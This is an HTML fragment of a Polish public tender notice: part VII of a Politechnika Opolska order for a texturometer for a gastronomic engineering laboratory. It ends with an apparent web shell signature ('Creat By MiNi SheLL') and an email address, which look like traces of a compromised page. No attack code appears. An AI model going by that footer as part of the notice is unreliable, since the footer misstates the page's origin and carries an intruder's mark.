<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> część VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, wraz z instalacją i szkoleniem, fabrycznie nowego, nieeksploatowanego i niewadliwego sprzętu do Laboratorium Inżynierii Gastronomicznej dla Politechniki Opolskiej tj.: 

Część VII
Tab. 1	 Teksturometr (1 kpl)

Szczegółowy opis przedmiotu zamówienia określony został w wykazie rzeczowo-cenowym, stanowiącym załącznik nr 1g do SIWZ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com